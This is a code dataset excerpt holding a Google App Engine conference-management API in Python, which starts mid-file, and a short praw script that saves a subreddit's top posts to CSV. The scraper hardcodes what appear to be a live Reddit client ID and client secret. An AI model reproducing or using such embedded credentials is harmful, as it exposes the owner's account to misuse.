websafeConferenceKey=messages.StringField(1),\n)\n\nCONF_POST_REQUEST = endpoints.ResourceContainer(\n ConferenceForm,\n websafeConferenceKey=messages.StringField(1),\n)\n\nSESS_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n)\n\nSESS_POST_REQUEST = endpoints.ResourceContainer(\n SessionForm,\n websafeConferenceKey=messages.StringField(1),\n)\n\nSESS_TYPE_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n typeOfSession=messages.StringField(2)\n)\n\nSESS_WISH_POST_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeSessionKey=messages.StringField(1)\n)\n\nSESS_FILTER_GET_REQUEST = endpoints.ResourceContainer(\n message_types.VoidMessage,\n websafeConferenceKey=messages.StringField(1),\n operator=messages.StringField(2),\n value=messages.StringField(3)\n)\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n\n@endpoints.api(name='conference', version='v1',\n allowed_client_ids=[WEB_CLIENT_ID, API_EXPLORER_CLIENT_ID],\n scopes=[EMAIL_SCOPE])\nclass ConferenceApi(remote.Service):\n \"\"\"Conference API v0.1\"\"\"\n\n# - - - Conference objects - - - - - - - - - - - - - - - - -\n\n def _copyConferenceToForm(self, conf, displayName):\n \"\"\"Copy relevant fields from Conference to ConferenceForm.\"\"\"\n cf = ConferenceForm()\n for field in cf.all_fields():\n if hasattr(conf, field.name):\n # convert Date to date string; just copy others\n if field.name.endswith('Date'):\n setattr(cf, field.name, 
str(getattr(conf, field.name)))\n                else:\n                    setattr(cf, field.name, getattr(conf, field.name))\n            elif field.name == \"websafeKey\":\n                setattr(cf, field.name, conf.key.urlsafe())\n        if displayName:\n            setattr(cf, 'organizerDisplayName', displayName)\n        cf.check_initialized()\n        return cf\n\n\n    def _createConferenceObject(self, request):\n        \"\"\"Create or update Conference object, returning ConferenceForm/request.\"\"\"\n        # preload necessary data items\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n        user_id = getUserId(user)\n        # Ensure a profile gets created or conference retrieval will fail.\n        profile = self._getProfileFromUser()\n        if not profile:\n            raise endpoints.ConflictException(\"Unable to create or retrieve profile.\")\n        if not request.name:\n            raise endpoints.BadRequestException(\"Conference 'name' field required\")\n\n        # copy ConferenceForm/ProtoRPC Message into dict\n        data = {field.name: getattr(request, field.name) for field in request.all_fields()}\n        del data['websafeKey']\n        del data['organizerDisplayName']\n\n        # add default values for those missing (both data model & outbound Message)\n        for df in DEFAULTS:\n            if data[df] in (None, []):\n                data[df] = DEFAULTS[df]\n                setattr(request, df, DEFAULTS[df])\n\n        # convert dates from strings to Date objects; set month based on start_date\n        if data['startDate']:\n            data['startDate'] = datetime.strptime(data['startDate'][:10], \"%Y-%m-%d\").date()\n            data['month'] = data['startDate'].month\n        else:\n            data['month'] = 0\n        if data['endDate']:\n            data['endDate'] = datetime.strptime(data['endDate'][:10], \"%Y-%m-%d\").date()\n\n        # set seatsAvailable to be same as maxAttendees on creation\n        if data[\"maxAttendees\"] > 0:\n            data[\"seatsAvailable\"] = data[\"maxAttendees\"]\n        # generate a Profile key from the user ID, allocate a Conference ID\n        # with that Profile as parent, then build the Conference key from it\n        p_key = ndb.Key(Profile, user_id)\n        c_id = Conference.allocate_ids(size=1, parent=p_key)[0]\n        c_key = ndb.Key(Conference, c_id, parent=p_key)\n        data['key'] = c_key\n        data['organizerUserId'] = request.organizerUserId = user_id\n\n        # create Conference, send email to organizer confirming\n        # creation of Conference & return (modified) ConferenceForm\n        Conference(**data).put()\n        taskqueue.add(params={'email': user.email(),\n            'conferenceInfo': repr(request)},\n            url='/tasks/send_confirmation_email')\n\n        return request\n\n\n    @ndb.transactional()\n    def _updateConferenceObject(self, request):\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n        user_id = getUserId(user)\n\n        # copy ConferenceForm/ProtoRPC Message into dict\n        data = {field.name: getattr(request, field.name) for field in request.all_fields()}\n\n        # update existing conference\n        conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()\n        # check that conference exists\n        if not conf:\n            raise endpoints.NotFoundException(\n                'No conference found with key: %s' % request.websafeConferenceKey)\n\n        # check that user is owner\n        if user_id != conf.organizerUserId:\n            raise endpoints.ForbiddenException(\n                'Only the owner can update the conference.')\n\n        # Not getting all the fields, so don't create a new object; just\n        # copy relevant fields from ConferenceForm to Conference object\n        for field in request.all_fields():\n            data = getattr(request, field.name)\n            # only copy fields where we get data\n            if data not in (None, []):\n                # special handling for dates (convert string to Date)\n                if field.name in 
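# Sketch of the ancestor-key pattern used in _createConferenceObject above
# (the id string is illustrative): each Conference is stored as a child of
# the creating user's Profile, which is what makes the ancestor query in
# getConferencesCreated work.
p_key = ndb.Key(Profile, 'user@example.com')             # parent Profile key
c_id = Conference.allocate_ids(size=1, parent=p_key)[0]  # child numeric id
c_key = ndb.Key(Conference, c_id, parent=p_key)          # full Conference key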
('startDate', 'endDate'):\n data = datetime.strptime(data, \"%Y-%m-%d\").date()\n if field.name == 'startDate':\n conf.month = data.month\n # write to Conference object\n setattr(conf, field.name, data)\n conf.put()\n prof = ndb.Key(Profile, user_id).get()\n return self._copyConferenceToForm(conf, getattr(prof, 'displayName'))\n\n\n @endpoints.method(ConferenceForm, ConferenceForm,\n path='conference',\n http_method='POST', name='createConference')\n def createConference(self, request):\n \"\"\"Create new conference.\"\"\"\n return self._createConferenceObject(request)\n\n\n @endpoints.method(CONF_POST_REQUEST, ConferenceForm,\n path='conference/{websafeConferenceKey}',\n http_method='PUT', name='updateConference')\n def updateConference(self, request):\n \"\"\"Update conference w/provided fields & return w/updated info.\"\"\"\n return self._updateConferenceObject(request)\n\n\n @endpoints.method(CONF_GET_REQUEST, ConferenceForm,\n path='conference/{websafeConferenceKey}',\n http_method='GET', name='getConference')\n def getConference(self, request):\n \"\"\"Return requested conference (by websafeConferenceKey).\"\"\"\n # get Conference object from request; bail if not found\n conf = ndb.Key(urlsafe=request.websafeConferenceKey).get()\n if not conf:\n raise endpoints.NotFoundException(\n 'No conference found with key: %s' % request.websafeConferenceKey)\n prof = conf.key.parent().get()\n # return ConferenceForm\n return self._copyConferenceToForm(conf, getattr(prof, 'displayName'))\n\n\n @endpoints.method(message_types.VoidMessage, ConferenceForms,\n path='getConferencesCreated',\n http_method='POST',\n name='getConferencesCreated')\n def getConferencesCreated(self, request):\n \"\"\"Return conferences created by user.\"\"\"\n # make sure user is authed\n user = endpoints.get_current_user()\n if not user:\n raise endpoints.UnauthorizedException('Authorization required')\n user_id = getUserId(user)\n # create ancestor query for all key matches for this user\n confs = Conference.query(ancestor=ndb.Key(Profile, user_id))\n prof = ndb.Key(Profile, user_id).get()\n # return set of ConferenceForm objects per Conference\n return ConferenceForms(\n items=[self._copyConferenceToForm(conf, getattr(prof, 'displayName'))\n for conf in confs]\n )\n\n\n def _getSessionQuery(self, request, ancestor=None):\n \"\"\"Return formatted query from the submitted filter\"\"\"\n if not ancestor:\n q = Session.query()\n else:\n a_key = ancestor\n q = Session.query(ancestor=ndb.Key(urlsafe=a_key))\n\n inequality_filter, filters = self._formatFilters(request.filters)\n\n # If exists, sort on inequality filter first\n if not inequality_filter:\n q = q.order(Session.name)\n else:\n q = q.order(ndb.GenericProperty(inequality_filter))\n q = q.order(Session.name)\n\n for filtr in filters:\n if filtr[\"field\"] in [\"duration\"]:\n filtr[\"value\"] = int(filtr[\"value\"])\n formatted_query = ndb.query.FilterNode(filtr[\"field\"], filtr[\"operator\"], filtr[\"value\"])\n q = q.filter(formatted_query)\n return q\n\n\n def _getConferenceQuery(self, request):\n \"\"\"Return formatted query from the submitted filters.\"\"\"\n q = Conference.query()\n inequality_filter, filters = self._formatFilters(request.filters)\n # If exists, sort on inequality filter first\n if not inequality_filter:\n q = q.order(Conference.name)\n else:\n q = q.order(ndb.GenericProperty(inequality_filter))\n q = q.order(Conference.name)\n\n for filtr in filters:\n if filtr[\"field\"] in [\"month\", \"maxAttendees\"]:\n filtr[\"value\"] = 
int(filtr[\"value\"])\n            formatted_query = ndb.query.FilterNode(filtr[\"field\"], filtr[\"operator\"], filtr[\"value\"])\n            q = q.filter(formatted_query)\n        return q\n\n\n    def _formatFilters(self, filters):\n        \"\"\"Parse, check validity of, and format user-supplied filters.\"\"\"\n        formatted_filters = []\n        inequality_field = None\n\n        for f in filters:\n            filtr = {field.name: getattr(f, field.name) for field in f.all_fields()}\n            try:\n                filtr[\"field\"] = FIELDS[filtr[\"field\"]]\n                filtr[\"operator\"] = OPERATORS[filtr[\"operator\"]]\n            except KeyError:\n                raise endpoints.BadRequestException(\"Filter contains invalid field or operator.\")\n\n            # Every operation except \"=\" is an inequality\n            if filtr[\"operator\"] != \"=\":\n                # check if inequality operation has been used in previous filters\n                # disallow the filter if inequality was performed on a different field before\n                # track the field on which the inequality operation is performed\n                if inequality_field and inequality_field != filtr[\"field\"]:\n                    raise endpoints.BadRequestException(\"Inequality filter is allowed on only one field.\")\n                else:\n                    inequality_field = filtr[\"field\"]\n\n            formatted_filters.append(filtr)\n        return (inequality_field, formatted_filters)\n\n\n    @endpoints.method(QueryForms, ConferenceForms,\n                      path='queryConferences',\n                      http_method='POST',\n                      name='queryConferences')\n    def queryConferences(self, request):\n        \"\"\"Query for conferences.\"\"\"\n        conferences = self._getConferenceQuery(request)\n\n        # need to fetch organiser displayName from profiles\n        # get all keys and use get_multi for speed\n        organisers = [(ndb.Key(Profile, conf.organizerUserId)) for conf in conferences]\n        profiles = ndb.get_multi(organisers)\n\n        # put display names in a dict for easier fetching\n        names = {}\n        for profile in profiles:\n            names[profile.key.id()] = profile.displayName\n\n        # return individual ConferenceForm object per Conference\n        return ConferenceForms(items=[\n            self._copyConferenceToForm(conf, names[conf.organizerUserId])\n            for conf in conferences]\n        )\n\n\n# - - - Profile objects - - - - - - - - - - - - - - - - - - -\n\n    def _copyProfileToForm(self, prof):\n        \"\"\"Copy relevant fields from Profile to ProfileForm.\"\"\"\n        # copy relevant fields from Profile to ProfileForm\n        pf = ProfileForm()\n        for field in pf.all_fields():\n            if hasattr(prof, field.name):\n                # convert t-shirt string to Enum; just copy others\n                if field.name == 'teeShirtSize':\n                    setattr(pf, field.name, getattr(TeeShirtSize, getattr(prof, field.name)))\n                else:\n                    setattr(pf, field.name, getattr(prof, field.name))\n        pf.check_initialized()\n        return pf\n\n\n    def _getProfileFromUser(self):\n        \"\"\"Return user Profile from datastore, creating new one if non-existent.\"\"\"\n        # make sure user is authed\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n\n        # get Profile from datastore\n        user_id = getUserId(user)\n        p_key = ndb.Key(Profile, user_id)\n        profile = p_key.get()\n        # create new Profile if not there\n        if not profile:\n            profile = Profile(\n                key=p_key,\n                displayName=user.nickname(),\n                mainEmail=user.email(),\n                teeShirtSize=str(TeeShirtSize.NOT_SPECIFIED),\n            )\n            profile.put()\n\n        return profile  # return Profile\n\n\n    def _doProfile(self, save_request=None):\n        \"\"\"Get user Profile and return to user, possibly updating it first.\"\"\"\n        # get user Profile\n        prof = self._getProfileFromUser()\n\n        # if saveProfile(), process user-modifiable fields\n        if save_request:\n            for field in ('displayName', 'teeShirtSize'):\n                if 
hasattr(save_request, field):\n val = getattr(save_request, field)\n if val:\n setattr(prof, field, str(val))\n prof.put()\n\n # return ProfileForm\n return self._copyProfileToForm(prof)\n\n\n @endpoints.method(message_types.VoidMessage, ProfileForm,\n path='profile', http_method='GET', name='getProfile')\n def getProfile(self, request):\n \"\"\"Return user profile.\"\"\"\n return self._doProfile()\n\n\n @endpoints.method(ProfileMiniForm, ProfileForm,\n path='profile', http_method='POST', name='saveProfile')\n def saveProfile(self, request):\n \"\"\"Update & return user profile.\"\"\"\n return self._doProfile(request)\n\n\n# - - - Registration - - - - - - - - - - - - - - - - - - - -\n\n @ndb.transactional(xg=True)\n def _conferenceRegistration(self, request, reg=True):\n \"\"\"Register or unregister user for selected conference.\"\"\"\n retval = None\n prof = self._getProfileFromUser() # get user Profile\n\n # check if conf exists given websafeConfKey\n # get conference; check that it exists\n wsck = request.websafeConferenceKey\n conf = ndb.Key(urlsafe=wsck).get()\n if not conf:\n raise endpoints.NotFoundException(\n 'No conference found with key: %s' % wsck)\n\n # register\n if reg:\n # check if user already registered otherwise add\n if wsck in prof.conferenceKeysToAttend:\n raise ConflictException(\n \"You have already registered for this conference\")\n\n # check if seats avail\n if conf.seatsAvailable <= 0:\n raise ConflictException(\n \"There are no seats available.\")\n\n # register user, take away one seat\n prof.conferenceKeysToAttend.append(wsck)\n conf.seatsAvailable -= 1\n retval = True\n\n # unregister\n else:\n # check if user already registered\n if wsck in prof.conferenceKeysToAttend:\n\n # unregister user, add back one seat\n prof.conferenceKeysToAttend.remove(wsck)\n # remove sessions from wishlist\n seshs = Session.query(ancestor=ndb.Key(urlsafe=wsck)) \n for session in seshs:\n s_key = session.key.urlsafe()\n if s_key in prof.sessionWishlist:\n prof.sessionWishlist.remove(s_key)\n conf.seatsAvailable += 1\n retval = True\n else:\n retval = False\n\n # write things back to the datastore & return\n prof.put()\n conf.put()\n return BooleanMessage(data=retval)\n\n\n @endpoints.method(message_types.VoidMessage, ConferenceForms,\n path='conferences/attending',\n http_method='GET', name='getConferencesToAttend')\n def getConferencesToAttend(self, request):\n \"\"\"Get list of conferences that user has registered for.\"\"\"\n prof = self._getProfileFromUser() # get user Profile\n conf_keys = [ndb.Key(urlsafe=wsck) for wsck in prof.conferenceKeysToAttend]\n conferences = ndb.get_multi(conf_keys)\n\n # get organizers\n organisers = [ndb.Key(Profile, conf.organizerUserId) for conf in conferences]\n profiles = ndb.get_multi(organisers)\n\n # put display names in a dict for easier fetching\n names = {}\n for profile in profiles:\n names[profile.key.id()] = profile.displayName\n\n # return set of ConferenceForm objects per Conference\n return ConferenceForms(items=[\n self._copyConferenceToForm(conf, names[conf.organizerUserId])\n for conf in conferences]\n )\n\n\n @endpoints.method(CONF_GET_REQUEST, BooleanMessage,\n path='conference/{websafeConferenceKey}',\n http_method='POST', name='registerForConference')\n def registerForConference(self, request):\n \"\"\"Register user for selected conference.\"\"\"\n return self._conferenceRegistration(request)\n\n\n @endpoints.method(CONF_GET_REQUEST, BooleanMessage,\n path='conference/{websafeConferenceKey}',\n http_method='DELETE', 
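# Why _conferenceRegistration above is decorated with xg=True (sketch with
# made-up names): Profile and Conference live in different entity groups, so
# updating both atomically requires a cross-group transaction.
@ndb.transactional(xg=True)
def _swap_one_seat(prof_key, conf_key):
    prof, conf = prof_key.get(), conf_key.get()
    prof.conferenceKeysToAttend.append(conf_key.urlsafe())
    conf.seatsAvailable -= 1
    ndb.put_multi([prof, conf])  # both writes commit or neither does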
name='unregisterFromConference')\n    def unregisterFromConference(self, request):\n        \"\"\"Unregister user for selected conference.\"\"\"\n        return self._conferenceRegistration(request, reg=False)\n\n\n# - - - Featured Speaker - - - - - - - - - - - - - - - - - - - -\n\n    def _getMemcacheData(self, conference, sessions):\n        \"\"\"Format the featured speaker message to say what\n        sessions the speaker is speaking at, and generate a\n        conference-specific memcache key for the featured speaker.\n        \"\"\"\n        sessionNames = \"\"\n        for session in sessions:\n            sessionNames += session.name + \", \"\n\n        # Drop the trailing \", \", then turn the last separator into \" and \"\n        # by reversing the string, patching the first \" ,\" and reversing back.\n        sessionNames = sessionNames[:len(sessionNames) - 2]\n        sessionNames = sessionNames[::-1]\n        sessionNames = sessionNames.replace(\" ,\", \" dna ,\", 1)\n        sessionNames = sessionNames[::-1]\n        speakingAt = \"{0} is speaking at: {1}\".format(session.speaker, sessionNames)\n        memcacheKey = conference.name.replace(\" \", \"_\").upper()\n        memcacheKey += MEMCACHE_SPEAKER_KEY\n        return memcacheKey, speakingAt\n\n\n    @staticmethod\n    def _setSpeakerInMemcache(memcacheKey, message):\n        \"\"\"Add a featured speaker key to the memcache. The most recent\n        speaker with multiple sessions will be in the cache.\n        \"\"\"\n        memcache.set(memcacheKey, message)\n\n\n    @endpoints.method(CONF_GET_REQUEST, StringMessage,\n                      path='conference/featuredSpeaker/get',\n                      http_method='GET',\n                      name='getFeaturedSpeaker')\n    def getFeaturedSpeaker(self, request):\n        \"\"\"Return featured speaker from memcache.\"\"\"\n        wsck = request.websafeConferenceKey\n        if not wsck:\n            raise endpoints.BadRequestException(\n                \"You must specify a conference key.\")\n        conf = ndb.Key(urlsafe=wsck).get()\n        if not conf:\n            raise endpoints.NotFoundException(\"No conference found with that key.\")\n        confNameKey = conf.name.upper().replace(\" \", \"_\")\n        keySpeaker = memcache.get(confNameKey + MEMCACHE_SPEAKER_KEY)\n        if not keySpeaker:\n            keySpeaker = \"\"\n        return StringMessage(message=keySpeaker)\n\n# - - - Announcements - - - - - - - - - - - - - - - - - - - -\n\n    @staticmethod\n    def _cacheAnnouncement():\n        \"\"\"Create Announcement & assign to memcache; used by memcache cron\n        job & putAnnouncement().\n        \"\"\"\n        confs = Conference.query(ndb.AND(\n            Conference.seatsAvailable <= 5,\n            Conference.seatsAvailable > 0)\n        ).fetch(projection=[Conference.name])\n\n        if confs:\n            # If there are almost-sold-out conferences, format the announcement\n            # and set it in the memcache\n            announcement = '{0} {1}'.\\\n                format('Last chance to attend! 
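# A more direct way to build the "A, B and C" string than the reverse/replace
# trick in _getMemcacheData above (sketch; the helper name is made up):
def join_session_names(names):
    if len(names) == 1:
        return names[0]
    return ", ".join(names[:-1]) + " and " + names[-1]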
The following conferences '\n                       'are nearly sold out:',\n                       ', '.join(conf.name for conf in confs))\n            memcache.set(MEMCACHE_ANNOUNCEMENTS_KEY, announcement)\n        else:\n            # If there are no sold out conferences, delete the memcache\n            # announcements entry\n            announcement = \"\"\n            memcache.delete(MEMCACHE_ANNOUNCEMENTS_KEY)\n\n        return announcement\n\n    @endpoints.method(message_types.VoidMessage, StringMessage,\n                      path='conference/announcement/get',\n                      http_method='GET',\n                      name='getAnnouncement')\n    def getAnnouncement(self, request):\n        \"\"\"Return Announcement from memcache.\"\"\"\n        announcement = memcache.get(MEMCACHE_ANNOUNCEMENTS_KEY)\n        if not announcement:\n            announcement = \"\"\n        return StringMessage(message=announcement)\n\n\n# - - - Sessions - - - - - - - - - - - - - - - - - - - -\n\n    def _copySessionToForm(self, sess):\n        \"\"\"Copy fields from the Session to the SessionForm.\"\"\"\n        sf = SessionForm()\n        for field in sf.all_fields():\n            if hasattr(sess, field.name):\n                if field.name == 'typeOfSession':\n                    setattr(sf, field.name,\n                            getattr(TypeOfSession, getattr(sess, field.name)))\n                elif field.name in ('startTime', 'date'):\n                    setattr(sf, field.name, str(getattr(sess, field.name)))\n                else:\n                    setattr(sf, field.name, getattr(sess, field.name))\n            elif field.name == 'websafeKey':\n                setattr(sf, field.name, sess.key.urlsafe())\n\n        sf.check_initialized()\n        return sf\n\n\n    def _createSession(self, request):\n        \"\"\"Create a session in a conference.\"\"\"\n        # preload necessary data items\n        wsck = request.websafeConferenceKey\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n        user_id = getUserId(user)\n\n        conf = ndb.Key(urlsafe=wsck).get()\n        # check that conference exists\n        if not conf:\n            raise endpoints.NotFoundException(\n                'No conference found with key: %s' % request.websafeConferenceKey)\n\n        # check that user is owner\n        if user_id != conf.organizerUserId:\n            raise endpoints.ForbiddenException(\n                'Only the owner can add a session to the conference.')\n\n        if not request.name:\n            raise endpoints.BadRequestException(\"Session 'name' field required\")\n\n        # Check that session names are unique to a conference\n        sameNameQuery = Session.query(ancestor=ndb.Key(urlsafe=wsck)).\\\n            filter(Session.name != \"TBA\").\\\n            filter(Session.name == request.name)\n        if sameNameQuery.count() > 0:\n            raise endpoints.BadRequestException(\n                \"A session already exists with that name for this conference.\")\n\n        # generate Session Key based on conference key,\n        # session id, and session name.\n        c_key = ndb.Key(urlsafe=request.websafeConferenceKey)\n        s_id = Session.allocate_ids(size=1, parent=c_key)[0]\n        s_key = ndb.Key(Session, s_id, parent=c_key)\n\n        session = Session(key=s_key)\n\n        for field in request.all_fields():\n            data = getattr(request, field.name)\n            if data not in (None, []):\n                if field.name == 'startTime':\n                    data = datetime.strptime(data, \"%H:%M:%S\").time()\n                if field.name == 'date':\n                    data = datetime.strptime(data, \"%Y-%m-%d\").date()\n                if field.name == 'typeOfSession':\n                    data = str(data)\n\n                setattr(session, field.name, data)\n\n        session.put()\n\n        # Check to see if the speaker of this session is doing any\n        # other sessions. 
If so, make them a featured speaker in memcache.\n        spkrSessions = Session.query(ancestor=ndb.Key(urlsafe=wsck)).\\\n            filter(Session.speaker == session.speaker)\n        if spkrSessions.count() > 1:\n            memcacheKey, message = self._getMemcacheData(conf, spkrSessions)\n            taskqueue.add(params={'memcacheKey': memcacheKey,\n                'message': message},\n                url='/tasks/set_featured_speaker')\n        return self._copySessionToForm(session)\n\n\n    @endpoints.method(SESS_POST_REQUEST, SessionForm,\n                      path='session/{websafeConferenceKey}',\n                      http_method='POST',\n                      name='createSession')\n    def createSession(self, request):\n        \"\"\"Create new session in a conference.\"\"\"\n        return self._createSession(request)\n\n\n    @endpoints.method(SESS_GET_REQUEST, SessionForms,\n                      path='session/{websafeConferenceKey}',\n                      http_method='GET',\n                      name='getConferenceSessions')\n    def getConferenceSessions(self, request):\n        \"\"\"Return sessions that are in a conference.\"\"\"\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n\n        sessions = Session.query(ancestor=ndb.Key(urlsafe=request.websafeConferenceKey))\n        return SessionForms(\n            sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n        )\n\n\n    @endpoints.method(SESS_TYPE_GET_REQUEST, SessionForms,\n                      path='session/type/{websafeConferenceKey}',\n                      http_method='GET',\n                      name='getSessionsByType')\n    def getSessionsByType(self, request):\n        \"\"\"Return sessions in a conference of a certain type.\"\"\"\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n        # Filter sessions on their conference key and the type of session\n        sessions = Session.query(\n            ancestor=ndb.Key(urlsafe=request.websafeConferenceKey)\n        ).filter(Session.typeOfSession == request.typeOfSession)\n        return SessionForms(\n            sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n        )\n\n\n    @endpoints.method(StringMessage, SessionForms,\n                      path='session/speaker',\n                      http_method='GET',\n                      name='getSessionsBySpeaker')\n    def getSessionsBySpeaker(self, request):\n        \"\"\"Get sessions by a speaker across all conferences.\"\"\"\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n        # Filter sessions on speaker name\n        sessions = Session.query().filter(Session.speaker == request.message)\n        return SessionForms(\n            sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n        )\n\n\n    @endpoints.method(SESS_WISH_POST_REQUEST, BooleanMessage,\n                      path='profile/wishlist/{websafeSessionKey}',\n                      http_method='POST',\n                      name='addSessionToWishlist')\n    def addSessionToWishlist(self, request):\n        \"\"\"Add a session to the profile's wishlist of sessions to attend.\"\"\"\n        retval = False\n        wssk = request.websafeSessionKey\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n\n        # Get the session\n        session = ndb.Key(urlsafe=wssk).get()\n        if not session:\n            raise endpoints.NotFoundException(\n                'No session found with key: {}'.format(wssk))\n\n        # Get the profile\n        user_id = getUserId(user)\n        profile = ndb.Key(Profile, user_id).get()\n\n        # Check that it's not already on the wishlist\n        if wssk in profile.sessionWishlist:\n            raise ConflictException(\"This session is already in your wishlist.\")\n\n        # Check that the session is in a conference the user is registered\n        # for: a session's parent key is its conference.\n        if session.key.parent().urlsafe() in profile.conferenceKeysToAttend:\n            profile.sessionWishlist.append(wssk)\n            profile.put()\n            retval = True\n        else:\n            raise endpoints.ForbiddenException(\n                \"You are not attending the conference that this session is in.\")\n\n        return BooleanMessage(data=retval)\n\n\n    @endpoints.method(CONF_GET_REQUEST, SessionForms,\n                      path='profile/wishlist/{websafeConferenceKey}',\n                      http_method='GET',\n                      name='getSessionsInWishlist')\n    def getSessionsInWishlist(self, request):\n        \"\"\"Get the sessions in the user's wishlist for the given conference key.\"\"\"\n        wsck = request.websafeConferenceKey\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n\n        # Get the profile\n        user_id = getUserId(user)\n        profile = ndb.Key(Profile, user_id).get()\n        sessions = [ndb.Key(urlsafe=wssk).get() for wssk in profile.sessionWishlist]\n\n        # Keep only sessions whose parent (conference) key matches; filtering\n        # into a new list avoids removing items from the list being iterated.\n        sessions = [session for session in sessions\n                    if session.key.parent().urlsafe() == wsck]\n\n        return SessionForms(\n            sessions=[self._copySessionToForm(sesh) for sesh in sessions]\n        )\n\n\n    @endpoints.method(SESS_WISH_POST_REQUEST, BooleanMessage,\n                      path='profile/wishlist/{websafeSessionKey}',\n                      http_method='DELETE',\n                      name='deleteSessionInWishlist')\n    def deleteSessionInWishlist(self, request):\n        \"\"\"Delete a session from the user's wishlist.\"\"\"\n        wssk = request.websafeSessionKey\n        retval = False\n\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n\n        # Get the user profile and remove the session if it's there\n        user_id = getUserId(user)\n        profile = ndb.Key(Profile, user_id).get()\n        if wssk in profile.sessionWishlist:\n            profile.sessionWishlist.remove(wssk)\n            retval = True\n\n        # Update the profile\n        profile.put()\n        return BooleanMessage(data=retval)\n\n\n    @endpoints.method(SESS_FILTER_GET_REQUEST, SessionForms,\n                      path='session/duration/{websafeConferenceKey}',\n                      http_method='GET',\n                      name='getSessionsByDuration')\n    def getSessionsByDuration(self, request):\n        \"\"\"Filter a conference's sessions by their duration.\"\"\"\n        # Authorize\n        wsck = request.websafeConferenceKey\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n        # Fill the query to have field, op and value\n        query = QueryForm(field='DURATION',\n                          operator=request.operator,\n                          value=request.value)\n        sessions = self._getSessionQuery(\n            QueryForms(filters=[query]), ancestor=wsck)\n        return SessionForms(\n            sessions=[self._copySessionToForm(session) for session in sessions]\n        )\n\n\n    @endpoints.method(QueryForms, SessionForms,\n                      path='querySessions',\n                      http_method='POST',\n                      name='querySessions')\n    def querySessions(self, request):\n        \"\"\"Filter sessions by type and start time.\"\"\"\n        # Authorize\n        user = endpoints.get_current_user()\n        if not user:\n            raise endpoints.UnauthorizedException('Authorization required')\n\n        # check for the first start-time filter and pull it out, otherwise\n        # business as usual. (Iterate over a copy so the remove() does not\n        # skip elements of the list being walked.)\n        typeToRemove = None\n        fltrd_sess = []\n        for queryform in list(request.filters):\n            if queryform.field == \"SESS_START_TIME\":\n                typeToRemove = queryform\n                request.filters.remove(queryform)\n                break\n\n        sessions = self._getSessionQuery(request)\n\n        # Manually filter the sessions on start time\n        if typeToRemove:\n
            # Validate the operator name and parse the time once; both are\n            # loop-invariant.\n            if typeToRemove.operator not in OPERATORS:\n                raise endpoints.BadRequestException(\n                    \"Filter contains invalid field or operator.\")\n            op = typeToRemove.operator\n            try:\n                filter_time = datetime.strptime(typeToRemove.value, \"%H:%M:%S\").time()\n            except ValueError:\n                raise endpoints.BadRequestException(\"Incorrect time format. Expecting: HH:MM:SS\")\n            for sesh in sessions:\n                if sesh.startTime:\n                    if op == \"EQ\":\n                        if sesh.startTime == filter_time:\n                            fltrd_sess.append(sesh)\n                    elif op == \"GT\":\n                        if sesh.startTime > filter_time:\n                            fltrd_sess.append(sesh)\n                    elif op == 'GTEQ':\n                        if sesh.startTime >= filter_time:\n                            fltrd_sess.append(sesh)\n                    elif op == 'LT':\n                        if sesh.startTime < filter_time:\n                            fltrd_sess.append(sesh)\n                    elif op == 'LTEQ':\n                        if sesh.startTime <= filter_time:\n                            fltrd_sess.append(sesh)\n                    elif op == 'NE':\n                        if sesh.startTime != filter_time:\n                            fltrd_sess.append(sesh)\n\n            # Return time-filtered sessions\n            return SessionForms(\n                sessions=[self._copySessionToForm(session) for session in fltrd_sess]\n            )\n\n        # Return sessions if query was standard\n        return SessionForms(\n            sessions=[self._copySessionToForm(session) for session in sessions]\n        )\n\n\napi = endpoints.api_server([ConferenceApi])  # register API\n","repo_name":"Crewe/conference-central-api","sub_path":"conference.py","file_name":"conference.py","file_ext":"py","file_size_in_byte":38095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"26926236901","text":"import praw\r\nimport pandas as pd\r\n\r\nredditApp = praw.Reddit(client_id='XDVRjPR6Wnr1ig', client_secret='crfLIN0aF9eGnmefzjzcW6hmcw4', user_agent='RedditScraping')\r\n\r\ntop_posts = redditApp.subreddit('InternetIsBeautiful').top(limit=1000)  # top 1k posts on the subreddit\r\nposts = []\r\n\r\n\r\nfor post in top_posts:\r\n    posts.append([post.title, post.score, post.id, post.url])\r\n\r\nposts = pd.DataFrame(posts,columns=['title', 'score', 'id', 'url'])\r\n\r\n\r\nposts.to_csv('top.csv')\r\n","repo_name":"naser-da/RedditScraper","sub_path":"RedditScraper.py","file_name":"RedditScraper.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
